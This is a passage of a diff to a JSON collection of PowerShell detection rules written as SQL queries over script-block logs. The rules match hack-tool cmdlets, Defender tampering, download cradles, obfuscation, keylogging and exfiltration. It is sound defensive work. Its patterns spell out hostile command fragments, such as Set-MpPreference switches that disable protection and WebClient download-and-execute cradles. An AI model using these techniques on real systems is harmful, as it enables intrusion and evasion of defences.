ScriptBlockText LIKE '%Out-WebQuery%' ESCAPE '\\' OR ScriptBlockText LIKE '%Out-Word%' ESCAPE '\\' OR ScriptBlockText LIKE '%Parse\\_Keys%' ESCAPE '\\' OR ScriptBlockText LIKE '%Password-List%' ESCAPE '\\' OR ScriptBlockText LIKE '%Powerpreter%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-Persistence%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-PoshRat%' ESCAPE '\\' 
OR ScriptBlockText LIKE '%Remove-Update%' ESCAPE '\\' OR ScriptBlockText LIKE '%Run-EXEonRemote%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-DCShadowPermissions%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemotePSRemoting%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-RemoteWMI%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode32%' ESCAPE '\\' OR ScriptBlockText LIKE '%Shellcode64%' ESCAPE '\\' OR ScriptBlockText LIKE '%StringtoBase64%' ESCAPE '\\' OR ScriptBlockText LIKE '%TexttoExe%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_var.yml" + "filename": "posh_ps_nishang_malicious_commandlets.yml" }, { - "title": "Automated Collection Command PowerShell", - "id": "c1dda054-d638-4c16-afc8-53e007f3fbc5", + "title": "PowerShell PSAttack", + "id": "b7ec41a4-042c-4f31-a5db-d0fcde9fa5c5", "status": "test", - "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", - "author": "frack113", + "description": "Detects the use of PSAttack PowerShell hack tool", + "author": "Sean Metcalf (source), Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1119" + "attack.execution", + "attack.t1059.001" ], "falsepositives": [ "Unknown" ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%.doc%' ESCAPE '\\' OR ScriptBlockText LIKE '%.docx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xls%' ESCAPE '\\' OR ScriptBlockText LIKE '%.xlsx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.ppt%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pptx%' ESCAPE '\\' OR ScriptBlockText LIKE '%.rtf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.pdf%' ESCAPE '\\' OR ScriptBlockText LIKE '%.txt%' ESCAPE '\\') AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '% -Recurse %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Include %' ESCAPE '\\')" - ], - 
"filename": "posh_ps_automated_collection.yml" - }, - { - "title": "Tamper Windows Defender - ScriptBlockLogging", - "id": "14c71865-6cd3-44ae-adaa-1db923fae5f2", - "status": "experimental", - "description": "Detects powershell scripts attempting to disable scheduled scanning and other parts of windows defender atp or set default actions to allow.", - "author": "frack113, elhoim, Tim Shelton (fps, alias support)", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001" - ], - "falsepositives": [ - "Legitimate PowerShell scripts" - ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND (ScriptBlockText LIKE '%DisableRealtimeMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRemovableDriveScanning 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles 1%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableRealtimeMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBehaviorMonitoring $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScriptScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableArchiveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableBlockAtFirstSeen $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIOAVProtection $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableIntrusionPreventionSystem $true%' ESCAPE '\\' OR ScriptBlockText LIKE 
'%DisableRemovableDriveScanning $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningMappedNetworkDrivesForFullScan $true%' ESCAPE '\\' OR ScriptBlockText LIKE '%DisableScanningNetworkFiles $true%' ESCAPE '\\')) OR ((ScriptBlockText LIKE '%Set-MpPreference%' ESCAPE '\\' AND ScriptBlockText LIKE '%Allow%' ESCAPE '\\' AND (ScriptBlockText LIKE '%LowThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%ModerateThreatDefaultAction%' ESCAPE '\\' OR ScriptBlockText LIKE '%HighThreatDefaultAction%' ESCAPE '\\')) OR (ScriptBlockText LIKE '%ltdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%mtdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%htdefac %' ESCAPE '\\' OR ScriptBlockText LIKE '%stdefac %' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%PS ATTACK!!!%' ESCAPE '\\')" ], - "filename": "posh_ps_tamper_defender.yml" + "filename": "posh_ps_psattack.yml" }, { - "title": "Execute Invoke-command on Remote Host", - "id": "7b836d7f-179c-4ba4-90a7-a7e60afb48e6", + "title": "Powershell Directory Enumeration", + "id": "162e69a7-7981-4344-84a9-0f1c9a217a52", "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). 
The adversary may then perform actions as the logged-on user.", + "description": "Detects technique used by MAZE ransomware to enumerate directories using Powershell", "author": "frack113", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.discovery", + "attack.t1083" ], "falsepositives": [ - "Legitimate script" + "Legitimate PowerShell scripts" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%invoke-command %' ESCAPE '\\' AND ScriptBlockText LIKE '% -ComputerName %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%foreach%' ESCAPE '\\' AND ScriptBlockText LIKE '%Get-ChildItem%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Path %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ErrorAction %' ESCAPE '\\' AND ScriptBlockText LIKE '%SilentlyContinue%' ESCAPE '\\' AND ScriptBlockText LIKE '%Out-File %' ESCAPE '\\' AND ScriptBlockText LIKE '%-append%' ESCAPE '\\')" ], - "filename": "posh_ps_invoke_command_remote.yml" + "filename": "posh_ps_susp_directory_enum.yml" }, { - "title": "Suspicious PowerShell Invocations - Generic", - "id": "ed965133-513f-41d9-a441-e38076a0798f", - "status": "test", + "title": "Suspicious PowerShell Invocations - Specific", + "id": "ae7fbf8e-f3cb-49fd-8db4-5f3bed522c71", + "status": "experimental", "description": "Detects suspicious PowerShell invocation command parameters", - "author": "Florian Roth (Nextron Systems)", + "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro", "tags": [ "attack.execution", "attack.t1059.001" ], "falsepositives": [ - "Very special / sneaky PowerShell scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 
'PowerShellCore/Operational') AND (ScriptBlockText LIKE '% -enc %' ESCAPE '\\' OR ScriptBlockText LIKE '% -EncodedCommand %' ESCAPE '\\' OR ScriptBlockText LIKE '% -ec %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -w hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -window hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -windowstyle hidden %' ESCAPE '\\' OR ScriptBlockText LIKE '% -w 1 %' ESCAPE '\\') AND (ScriptBlockText LIKE '% -noni %' ESCAPE '\\' OR ScriptBlockText LIKE '% -noninteractive %' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND ((ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::FromBase64String%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noni%' ESCAPE '\\' AND ScriptBlockText LIKE '%-nop%' ESCAPE '\\' AND ScriptBlockText LIKE '% -c %' ESCAPE '\\' AND ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\') OR (ScriptBlockText LIKE '% -w %' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%-ep%' ESCAPE '\\' AND ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-Enc%' ESCAPE '\\') OR (ScriptBlockText LIKE '%powershell%' ESCAPE '\\' AND ScriptBlockText LIKE '%reg%' ESCAPE '\\' AND ScriptBlockText LIKE '%add%' ESCAPE '\\' AND ScriptBlockText LIKE '%HKCU\\\\software\\\\microsoft\\\\windows\\\\currentversion\\\\run%' ESCAPE '\\') OR (ScriptBlockText LIKE '%bypass%' ESCAPE '\\' AND ScriptBlockText LIKE '%-noprofile%' ESCAPE '\\' AND ScriptBlockText LIKE '%-windowstyle%' ESCAPE '\\' AND ScriptBlockText LIKE '%hidden%' ESCAPE '\\' AND ScriptBlockText LIKE '%new-object%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%system.net.webclient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.download%' ESCAPE '\\') OR (ScriptBlockText LIKE '%iex%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-Object%' ESCAPE '\\' AND ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' AND ScriptBlockText LIKE '%.Download%' ESCAPE '\\')) AND NOT (((ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://community.chocolatey.org/install.ps1%' ESCAPE '\\' OR ScriptBlockText LIKE '%(New-Object System.Net.WebClient).DownloadString(''https://chocolatey.org/install.ps1'')%' ESCAPE '\\' OR ScriptBlockText LIKE '%Write-ChocolateyWarning%' ESCAPE '\\'))))" ], - "filename": "posh_ps_susp_invocation_generic.yml" + "filename": "posh_ps_susp_invocation_specific.yml" }, { - "title": "Usage Of Web Request Commands And Cmdlets - ScriptBlock", - "id": "1139d2e2-84b1-4226-b445-354492eba8ba", + "title": "Potential COM Objects Download Cradles Usage - PS Script", + "id": "3c7d1587-3b13-439f-9941-7d14313dbdfe", "status": "experimental", - "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via PowerShell scriptblock logs", - "author": "James Pemberton / @4A616D6573", - "tags": [ - "attack.execution", - "attack.t1059.001" - ], + "description": "Detects usage of COM objects that can be abused to download files in PowerShell by CLSID", + "author": "frack113", "falsepositives": [ - "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." 
+ "Legitimate use of the library" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText LIKE '%Invoke-WebRequest%' ESCAPE '\\' OR ScriptBlockText LIKE '%iwr %' ESCAPE '\\' OR ScriptBlockText LIKE '%wget %' ESCAPE '\\' OR ScriptBlockText LIKE '%curl %' ESCAPE '\\' OR ScriptBlockText LIKE '%Net.WebClient%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%Resume-BitsTransfer%' ESCAPE '\\' OR ScriptBlockText LIKE '%[System.Net.WebRequest]::create%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-RestMethod%' ESCAPE '\\' OR ScriptBlockText LIKE '%WinHttp.WinHttpRequest%' ESCAPE '\\') AND NOT (Path LIKE 'C:\\\\Packages\\\\Plugins\\\\Microsoft.GuestConfiguration.ConfigurationforWindows\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Type]::GetTypeFromCLSID(%' ESCAPE '\\' AND (ScriptBlockText LIKE '%0002DF01-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%F6D90F16-9C73-11D3-B32E-00C04F990BB4%' ESCAPE '\\' OR ScriptBlockText LIKE '%F5078F35-C551-11D3-89B9-0000F81FE221%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0a-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFBA6B42-5692-48EA-8141-DC517DCF0EF1%' ESCAPE '\\' OR ScriptBlockText LIKE '%AFB40FFD-B609-40A3-9828-F88BBE11E4E3%' ESCAPE '\\' OR ScriptBlockText LIKE '%88d96a0b-f192-11d4-a65f-0040963251e5%' ESCAPE '\\' OR ScriptBlockText LIKE '%2087c2f4-2cef-4953-a8ab-66779b670495%' ESCAPE '\\' OR ScriptBlockText LIKE '%000209FF-0000-0000-C000-000000000046%' ESCAPE '\\' OR ScriptBlockText LIKE '%00024500-0000-0000-C000-000000000046%' ESCAPE '\\'))" ], - "filename": "posh_ps_web_request_cmd_and_cmdlets.yml" + "filename": "posh_ps_download_com_cradles.yml" }, { - "title": 
"Silence.EDA Detection", - "id": "3ceb2083-a27f-449a-be33-14ec1b7cc973", - "status": "test", - "description": "Detects Silence EmpireDNSAgent as described in the Group-IP report", - "author": "Alina Stepchenkova, Group-IB, oscd.community", + "title": "Powershell Token Obfuscation - Powershell", + "id": "f3a98ce4-6164-4dd4-867c-4d83de7eca51", + "status": "experimental", + "description": "Detects TOKEN OBFUSCATION technique from Invoke-Obfuscation", + "author": "frack113", "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.command_and_control", - "attack.t1071.004", - "attack.t1572", - "attack.impact", - "attack.t1529", - "attack.g0091", - "attack.s0363" + "attack.defense_evasion", + "attack.t1027.009" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%System.Diagnostics.Process%' ESCAPE '\\' AND ScriptBlockText LIKE '%Stop-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Restart-Computer%' ESCAPE '\\' AND ScriptBlockText LIKE '%Exception in execution%' ESCAPE '\\' AND ScriptBlockText LIKE '%$cmdargs%' ESCAPE '\\' AND ScriptBlockText LIKE '%Close-Dnscat2Tunnel%' ESCAPE '\\' AND ScriptBlockText LIKE '%set type=$LookupType`nserver%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Command | nslookup 2>&1 | Out-String%' ESCAPE '\\' AND ScriptBlockText LIKE '%New-RandomDNSField%' ESCAPE '\\' AND ScriptBlockText LIKE '%[Convert]::ToString($SYNOptions, 16)%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session.Dead = $True%' ESCAPE '\\' AND ScriptBlockText LIKE '%$Session[\"Driver\"] -eq%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational')) AND (ScriptBlockText REGEXP '\\w+`(\\w+|-|.)`[\\w+|\\s]' OR ScriptBlockText REGEXP '\"(\\{\\d\\}){2,}\"\\s*-f' OR ScriptBlockText REGEXP 
'\\$\\{((e|n|v)*`(e|n|v)*)+:path\\}|\\$\\{((e|n|v)*`(e|n|v)*)+:((p|a|t|h)*`(p|a|t|h)*)+\\}|\\$\\{env:((p|a|t|h)*`(p|a|t|h)*)+\\}') AND NOT (((ScriptBlockText LIKE '%it will return true or false instead%' ESCAPE '\\' OR ScriptBlockText LIKE '%The function also prevents `Get-ItemProperty` from failing%' ESCAPE '\\')) OR (Path LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Exchange Server\\\\%' ESCAPE '\\' AND Path LIKE '%\\\\bin\\\\servicecontrol.ps1' ESCAPE '\\' AND ScriptBlockText LIKE '%`r`n%' ESCAPE '\\')))" ], - "filename": "posh_ps_apt_silence_eda.yml" + "filename": "posh_ps_token_obfuscation.yml" }, { - "title": "Invoke-Obfuscation Via Use Rundll32 - PowerShell", - "id": "a5a30a6e-75ca-4233-8b8c-42e0f2037d3b", + "title": "AADInternals PowerShell Cmdlets Execution - PsScript", + "id": "91e69562-2426-42ce-a647-711b8152ced6", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. 
Which can be abused by threat actors to attack Azure AD or Office 365.", + "author": "Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.reconnaissance", + "attack.discovery", + "attack.credential_access", + "attack.impact" ], "falsepositives": [ - "Unknown" + "Legitimate use of the library for administrative activity" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%&&%' ESCAPE '\\' AND ScriptBlockText LIKE '%rundll32%' ESCAPE '\\' AND ScriptBlockText LIKE '%shell32.dll%' ESCAPE '\\' AND ScriptBlockText LIKE '%shellexec\\_rundll%' ESCAPE '\\' AND (ScriptBlockText LIKE '%value%' ESCAPE '\\' OR ScriptBlockText LIKE '%invoke%' ESCAPE '\\' OR ScriptBlockText LIKE '%comspec%' ESCAPE '\\' OR ScriptBlockText LIKE '%iex%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND (ScriptBlockText LIKE '%Add-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%ConvertTo-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Disable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Enable-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Export-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Get-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Grant-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Install-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Invoke-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Join-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%New-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Open-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Read-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Register-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Remove-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Restore-AADInt%' 
ESCAPE '\\' OR ScriptBlockText LIKE '%Search-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Send-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Set-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Start-AADInt%' ESCAPE '\\' OR ScriptBlockText LIKE '%Update-AADInt%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_use_rundll32.yml" + "filename": "posh_ps_aadinternals_cmdlets_execution.yml" }, { - "title": "DirectorySearcher Powershell Exploitation", - "id": "1f6399cf-2c80-4924-ace1-6fcff3393480", + "title": "Powershell Execute Batch Script", + "id": "b5522a23-82da-44e5-9c8b-e10ed8955f88", "status": "test", - "description": "Enumerates Active Directory to determine computers that are joined to the domain", + "description": "Adversaries may abuse the Windows command shell for execution.\nThe Windows command shell ([cmd](https://attack.mitre.org/software/S0106)) is the primary command prompt on Windows systems.\nThe Windows command prompt can be used to control almost any aspect of a system, with various permission levels required for different subsets of commands.\nBatch files (ex: .bat or .cmd) also provide the shell with a list of sequential commands to run, as well as normal scripting operations such as conditionals and loops.\nCommon uses of batch files include long or repetitive tasks, or the need to run the same set of commands on multiple system\n", "author": "frack113", "tags": [ - "attack.discovery", - "attack.t1018" + "attack.execution", + "attack.t1059.003" ], "falsepositives": [ - "Unknown" + "Legitimate administration script" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-Object %' ESCAPE '\\' AND ScriptBlockText LIKE '%System.DirectoryServices.DirectorySearcher%' ESCAPE '\\' AND ScriptBlockText LIKE '%.PropertiesToLoad.Add%' ESCAPE '\\' AND ScriptBlockText LIKE '%.findall()%' ESCAPE '\\' AND 
ScriptBlockText LIKE '%Properties.name%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Start-Process%' ESCAPE '\\' AND (ScriptBlockText LIKE '%.cmd%' ESCAPE '\\' OR ScriptBlockText LIKE '%.bat%' ESCAPE '\\'))" ], - "filename": "posh_ps_directorysearcher.yml" + "filename": "posh_ps_susp_execute_batch_script.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell", - "id": "e54f5149-6ba3-49cf-b153-070d24679126", + "title": "PowerShell Create Local User", + "id": "243de76f-4725-4f2e-8225-a8a69b15ad61", + "status": "test", + "description": "Detects creation of a local user via PowerShell", + "author": "@ROxPinTeddy", + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.persistence", + "attack.t1136.001" + ], + "falsepositives": [ + "Legitimate user creation" + ], + "level": "medium", + "rule": [ + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%New-LocalUser%' ESCAPE '\\')" + ], + "filename": "posh_ps_create_local_user.yml" + }, + { + "title": "Windows Firewall Profile Disabled", + "id": "488b44e7-3781-4a71-888d-c95abfacf44d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects when a user disables the Windows Firewall via a Profile to help evade defense.", + "author": "Austin Songer @austinsonger", "tags": [ "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1562.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText REGEXP 
'(?i).*&&set.*(\\{\\d\\}){2,}\\\\\"\\s+?-f.*&&.*cmd.*/c')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Set-NetFirewallProfile %' ESCAPE '\\' AND ScriptBlockText LIKE '% -Enabled %' ESCAPE '\\' AND ScriptBlockText LIKE '% False%' ESCAPE '\\' AND (ScriptBlockText LIKE '% -All %' ESCAPE '\\' OR ScriptBlockText LIKE '%Public%' ESCAPE '\\' OR ScriptBlockText LIKE '%Domain%' ESCAPE '\\' OR ScriptBlockText LIKE '%Private%' ESCAPE '\\'))" ], - "filename": "posh_ps_invoke_obfuscation_via_var.yml" + "filename": "posh_ps_windows_firewall_profile_disabled.yml" }, { - "title": "Enable Windows Remote Management", - "id": "991a9744-f2f0-44f2-bd33-9092eba17dc3", - "status": "test", - "description": "Adversaries may use Valid Accounts to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.", - "author": "frack113", + "title": "Potential Keylogger Activity", + "id": "965e2db9-eddb-4cf6-a986-7a967df651e4", + "status": "experimental", + "description": "Detects PowerShell scripts that contains reference to keystroke capturing functions", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.t1021.006" + "attack.collection", + "attack.credential_access", + "attack.t1056.001" ], "falsepositives": [ - "Legitimate script" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%Enable-PSRemoting %' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[Windows.Input.Keyboard]::IsKeyDown([System.Windows.Input.Key]::%' ESCAPE '\\')" ], - "filename": 
"posh_ps_enable_psremoting.yml" + "filename": "posh_ps_susp_keylogger_activity.yml" }, { - "title": "Code Executed Via Office Add-in XLL File", - "id": "36fbec91-fa1b-4d5d-8df1-8d8edcb632ad", - "status": "test", - "description": "Adversaries may abuse Microsoft Office add-ins to obtain persistence on a compromised system.\nOffice add-ins can be used to add functionality to Office programs\n", - "author": "frack113", + "title": "Potential Data Exfiltration Via Audio File", + "id": "e4f93c99-396f-47c8-bb0f-201b1fa69034", + "status": "experimental", + "description": "Detects potential exfiltration attempt via audio file using PowerShell", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1137.006" + "attack.exfiltration" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%new-object %' ESCAPE '\\' AND ScriptBlockText LIKE '%-ComObject %' ESCAPE '\\' AND ScriptBlockText LIKE '%.application%' ESCAPE '\\' AND ScriptBlockText LIKE '%.RegisterXLL%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%[System.Math]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%[IO.FileMode]::%' ESCAPE '\\' AND ScriptBlockText LIKE '%BinaryWriter%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x52%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x49%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x46%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x57%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x41%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x56%' ESCAPE '\\' AND ScriptBlockText LIKE '%0x45%' ESCAPE '\\' AND ScriptBlockText LIKE '%0xAC%' ESCAPE '\\')" ], - "filename": "posh_ps_office_comobject_registerxll.yml" + "filename": "posh_ps_audio_exfiltration.yml" 
}, { - "title": "Modify Group Policy Settings - ScriptBlockLogging", - "id": "b7216a7d-687e-4c8d-82b1-3080b2ad961f", - "status": "experimental", - "description": "Detect malicious GPO modifications can be used to implement many other malicious behaviors.", + "title": "Powershell Trigger Profiles by Add_Content", + "id": "05b3e303-faf0-4f4a-9b30-46cc13e69152", + "status": "test", + "description": "Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles.", "author": "frack113", "tags": [ - "attack.defense_evasion", "attack.privilege_escalation", - "attack.t1484.001" + "attack.t1546.013" ], "falsepositives": [ - "Legitimate use" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4104' AND Channel IN ('Microsoft-Windows-PowerShell/Operational', 'PowerShellCore/Operational') AND ScriptBlockText LIKE '%\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows\\\\System%' ESCAPE '\\' AND (ScriptBlockText LIKE '%GroupPolicyRefreshTimeDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffsetDC%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTime%' ESCAPE '\\' OR ScriptBlockText LIKE '%GroupPolicyRefreshTimeOffset%' ESCAPE '\\' OR ScriptBlockText LIKE '%EnableSmartScreen%' ESCAPE '\\' OR ScriptBlockText LIKE '%ShellSmartScreenLevel%' ESCAPE '\\'))" + 